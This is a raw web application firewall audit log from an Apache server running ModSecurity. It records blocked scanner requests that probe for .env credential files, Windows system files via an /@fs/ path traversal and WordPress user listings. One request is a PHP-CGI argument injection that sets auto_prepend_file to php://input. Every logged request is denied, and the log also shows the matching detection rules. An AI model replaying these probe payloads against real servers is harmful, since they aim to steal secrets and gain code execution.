[line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749549019208534 761 (- - -) Stopwatch2: 1749549019208534 761; combined=299, p1=262, p2=0, p3=0, p4=0, p5=37, sr=66, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8ea29c3a-Z-- --2345734b-A-- [10/Jun/2025:18:43:26 +0700] aEgaXpSz29O8wd7wtMuBNAAAAIs 103.236.140.4 54174 103.236.140.4 8181 --2345734b-B-- GET /core/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.85.66 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.85.66 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_6_8) AppleWebKit/537.13+ (KHTML, like Gecko) Version/5.1.7 Safari/534.57.2 Accept-Charset: utf-8 --2345734b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --2345734b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749555806941955 699 (- - -) Stopwatch2: 1749555806941955 699; combined=264, p1=231, p2=0, p3=0, p4=0, p5=33, sr=59, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2345734b-Z-- --388d4516-A-- [10/Jun/2025:19:00:10 +0700] aEgeSmkffiosQXBbxVZhRwAAAME 103.236.140.4 56812 103.236.140.4 8181 --388d4516-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.72.166 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.72.166 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --388d4516-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --388d4516-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749556810827557 912 (- - -) Stopwatch2: 1749556810827557 912; combined=397, p1=354, p2=0, p3=0, p4=0, p5=43, sr=77, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --388d4516-Z-- --230f9b68-A-- [10/Jun/2025:19:00:12 +0700] aEgeTDQZgo88hy0TiYyxfgAAAEU 103.236.140.4 56986 103.236.140.4 8181 --230f9b68-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.72.166 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.72.166 X-Forwarded-Proto: https Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --230f9b68-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --230f9b68-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749556812792090 861 (- - -) Stopwatch2: 1749556812792090 861; combined=381, p1=341, p2=0, p3=0, p4=0, p5=40, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --230f9b68-Z-- --f5f74f58-A-- [10/Jun/2025:19:09:22 +0700] aEggcjQZgo88hy0TiYy8ygAAAEs 103.236.140.4 50204 103.236.140.4 8181 --f5f74f58-B-- GET /.env HTTP/1.0 Host: wooin.epicgamer.org X-Real-IP: 206.189.233.36 X-Forwarded-Host: wooin.epicgamer.org X-Forwarded-Server: wooin.epicgamer.org X-Forwarded-For: 206.189.233.36 X-Forwarded-Proto: http Connection: close User-Agent: Go-http-client/1.1 --f5f74f58-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --f5f74f58-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749557362018993 688 (- - -) Stopwatch2: 1749557362018993 688; combined=219, p1=192, p2=0, p3=0, p4=0, p5=27, sr=50, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f5f74f58-Z-- --b643a741-A-- [10/Jun/2025:19:19:14 +0700] aEgiwjQZgo88hy0TiYzH_AAAAEM 103.236.140.4 48990 103.236.140.4 8181 --b643a741-B-- GET /@fs/C:/windows/win.ini?raw?? HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 195.178.110.39 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 195.178.110.39 X-Forwarded-Proto: http Connection: close User-Agent: python-requests/2.31.0 Accept: */* --b643a741-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b643a741-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".ini"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749557954239827 2877 (- - -) Stopwatch2: 1749557954239827 2877; combined=1389, p1=366, p2=996, p3=0, p4=0, p5=27, sr=60, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b643a741-Z-- --b3c1b827-A-- [10/Jun/2025:19:19:15 +0700] aEgiw2QJEkWdvAT5oU5i4gAAAAU 103.236.140.4 49096 103.236.140.4 8181 --b3c1b827-B-- GET /@fs/C:/windows/win.ini?raw?? HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 195.178.110.39 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 195.178.110.39 X-Forwarded-Proto: https Connection: close User-Agent: python-requests/2.31.0 Accept: */* --b3c1b827-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b3c1b827-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".ini"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749557955234037 2386 (- - -) Stopwatch2: 1749557955234037 2386; combined=936, p1=387, p2=523, p3=0, p4=0, p5=25, sr=76, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b3c1b827-Z-- --80957a45-A-- [10/Jun/2025:19:19:15 +0700] aEgiw2QJEkWdvAT5oU5i6gAAABM 103.236.140.4 49138 103.236.140.4 8181 --80957a45-B-- GET /@fs/C:/boot.ini?raw?? HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 195.178.110.39 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 195.178.110.39 X-Forwarded-Proto: http Connection: close User-Agent: python-requests/2.31.0 Accept: */* --80957a45-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --80957a45-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".ini"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749557955584440 2361 (- - -) Stopwatch2: 1749557955584440 2361; combined=951, p1=379, p2=547, p3=0, p4=0, p5=25, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --80957a45-Z-- --0d5e5d6d-A-- [10/Jun/2025:19:19:16 +0700] aEgixDQZgo88hy0TiYzIAwAAAEE 103.236.140.4 49208 103.236.140.4 8181 --0d5e5d6d-B-- GET /@fs/C:/boot.ini?raw?? HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 195.178.110.39 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 195.178.110.39 X-Forwarded-Proto: https Connection: close User-Agent: python-requests/2.31.0 Accept: */* --0d5e5d6d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0d5e5d6d-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||smkn22-jkt.sch.id|F|2"] [data ".ini"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749557956368604 2528 (- - -) Stopwatch2: 1749557956368604 2528; combined=1024, p1=397, p2=601, p3=0, p4=0, p5=26, sr=59, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0d5e5d6d-Z-- --7a9eec7e-A-- [10/Jun/2025:19:36:02 +0700] aEgmspSz29O8wd7wtMvIWwAAAI0 103.236.140.4 60140 103.236.140.4 8181 --7a9eec7e-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 208.76.40.194 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 208.76.40.194 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 Chrome/114.0.0.0 Safari/537.36 Accept: */* --7a9eec7e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7a9eec7e-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749558962431869 1422 (- - -) Stopwatch2: 1749558962431869 1422; combined=414, p1=370, p2=0, p3=0, p4=0, p5=44, sr=76, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7a9eec7e-Z-- --64c0021d-A-- [10/Jun/2025:19:39:41 +0700] aEgnjZSz29O8wd7wtMvOOgAAAIo 103.236.140.4 49504 103.236.140.4 8181 --64c0021d-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.87.59 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.87.59 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 7.1.1; 1607-A01 Build/NMF26F; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/66.0.3359.126 MQQBrowser/6.2 TBS/044807 Mobile Safari/537.36 MMWEBID/2867 MicroMessenger/7.0.6.1460(0x27000634) Process/tools NetType/WIFI Language/zh_CN Accept-Charset: utf-8 --64c0021d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --64c0021d-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749559181564568 939 (- - -) Stopwatch2: 1749559181564568 939; combined=429, p1=386, p2=0, p3=0, p4=0, p5=42, sr=90, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --64c0021d-Z-- --e7dc331f-A-- [10/Jun/2025:19:39:44 +0700] aEgnkGkffiosQXBbxVahnAAAAMo 103.236.140.4 49762 103.236.140.4 8181 --e7dc331f-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.87.59 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.87.59 X-Forwarded-Proto: http Connection: close User-Agent: Mozilla/5.0 Slackware/13.37 (X11; U; Linux x86_64; en-US) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.41 Accept-Charset: utf-8 --e7dc331f-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e7dc331f-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749559184237272 876 (- - -) Stopwatch2: 1749559184237272 876; combined=312, p1=272, p2=0, p3=0, p4=0, p5=40, sr=73, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e7dc331f-Z-- --a0c00023-A-- [10/Jun/2025:19:55:04 +0700] aEgrKGQJEkWdvAT5oU6MCwAAAAU 103.236.140.4 49800 103.236.140.4 8181 --a0c00023-B-- POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 180.178.94.161 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 180.178.94.161 X-Forwarded-Proto: https Connection: close Content-Length: 221 Accept: */* Upgrade-Insecure-Requests: 1 User-Agent: Custom-AsyncHttpClient Content-Type: application/x-www-form-urlencoded --a0c00023-C-- --a0c00023-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a0c00023-E-- --a0c00023-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i)php://(std(in|out|err)|(in|out)put|fd|memory|temp|filter)" at ARGS_NAMES:\xadd allow_url_include=1 \xadd auto_prepend_file=php://input. [file "/usr/local/apache/modsecurity-cwaf/rules/21_PHP_PHPGen.conf"] [line "22"] [id "218420"] [rev "2"] [msg "COMODO WAF: PHP Injection Attack: I/O Stream Found||103.236.140.4|F|2"] [data "Matched Data: php://input found within ARGS_NAMES:\x5cxadd allow_url_include=1 \x5cxadd auto_prepend_file=php://input: \xadd allow_url_include=1 \xadd auto_prepend_file=php://input"] [severity "CRITICAL"] [tag "CWAF"] [tag "PHPGen"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749560104917348 6191 (- - -) Stopwatch2: 1749560104917348 6191; combined=4607, p1=610, p2=3955, p3=0, p4=0, p5=42, sr=72, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a0c00023-Z-- --78f96576-A-- [10/Jun/2025:19:57:59 +0700] aEgr12kffiosQXBbxVa8qQAAAM8 103.236.140.4 37222 103.236.140.4 8181 --78f96576-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.87.59 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.87.59 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2) Accept-Charset: utf-8 --78f96576-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --78f96576-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749560279445814 837 (- - -) Stopwatch2: 1749560279445814 837; combined=360, p1=320, p2=0, p3=0, p4=0, p5=40, sr=80, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --78f96576-Z-- --1663352e-A-- [10/Jun/2025:20:00:34 +0700] aEgscpSz29O8wd7wtMvrOgAAAJA 103.236.140.4 51482 103.236.140.4 8181 --1663352e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 74.142.9.174 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 74.142.9.174 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --1663352e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --1663352e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749560434048106 1694 (- - -) Stopwatch2: 1749560434048106 1694; combined=942, p1=336, p2=587, p3=0, p4=0, p5=19, sr=104, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --1663352e-Z-- --cb674b3a-A-- [10/Jun/2025:20:09:27 +0700] aEguh2QJEkWdvAT5oU6dPQAAABc 103.236.140.4 43166 103.236.140.4 8181 --cb674b3a-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 202.138.238.136 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 202.138.238.136 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --cb674b3a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --cb674b3a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749560967414014 2171 (- - -) Stopwatch2: 1749560967414014 2171; combined=1105, p1=371, p2=708, p3=0, p4=0, p5=26, sr=55, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --cb674b3a-Z-- --3b9c3653-A-- [10/Jun/2025:20:22:24 +0700] aEgxkGkffiosQXBbxVbjtAAAAM4 103.236.140.4 54332 103.236.140.4 8181 --3b9c3653-B-- GET /.env HTTP/1.0 Host: bolang.twilightparadox.com X-Real-IP: 167.172.232.142 X-Forwarded-Host: bolang.twilightparadox.com X-Forwarded-Server: bolang.twilightparadox.com X-Forwarded-For: 167.172.232.142 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --3b9c3653-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --3b9c3653-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749561744427506 789 (- - -) Stopwatch2: 1749561744427506 789; combined=330, p1=295, p2=0, p3=0, p4=0, p5=35, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3b9c3653-Z-- --0432ff39-A-- [10/Jun/2025:20:59:38 +0700] aEg6SmkffiosQXBbxVYf7gAAANI 103.236.140.4 32816 103.236.140.4 8181 --0432ff39-B-- GET /apps/.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 196.251.85.74 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 196.251.85.74 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Linux; Android 5.1; C6740N Build/LMY47O) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.111 Mobile Safari/537.36 Accept-Charset: utf-8 --0432ff39-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --0432ff39-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749563978392719 924 (- - -) Stopwatch2: 1749563978392719 924; combined=413, p1=368, p2=0, p3=0, p4=0, p5=45, sr=78, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --0432ff39-Z-- --b5362500-A-- [10/Jun/2025:21:17:51 +0700] aEg-j2kffiosQXBbxVY_hgAAAMg 103.236.140.4 57244 103.236.140.4 8181 --b5362500-B-- GET /.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 157.245.156.33 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 157.245.156.33 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --b5362500-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b5362500-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1749565071970626 1233 (- - -) Stopwatch2: 1749565071970626 1233; combined=433, p1=379, p2=0, p3=0, p4=0, p5=54, sr=87, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b5362500-Z-- --f7170f62-A-- [10/Jun/2025:21:17:52 +0700] aEg-kJSz29O8wd7wtMtXCAAAAJM 103.236.140.4 57256 103.236.140.4 8181 --f7170f62-B-- GET /sendgrid/.env HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 157.245.156.33 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 157.245.156.33 X-Forwarded-Proto: http Connection: close User-agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36 Accept: */* --f7170f62-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 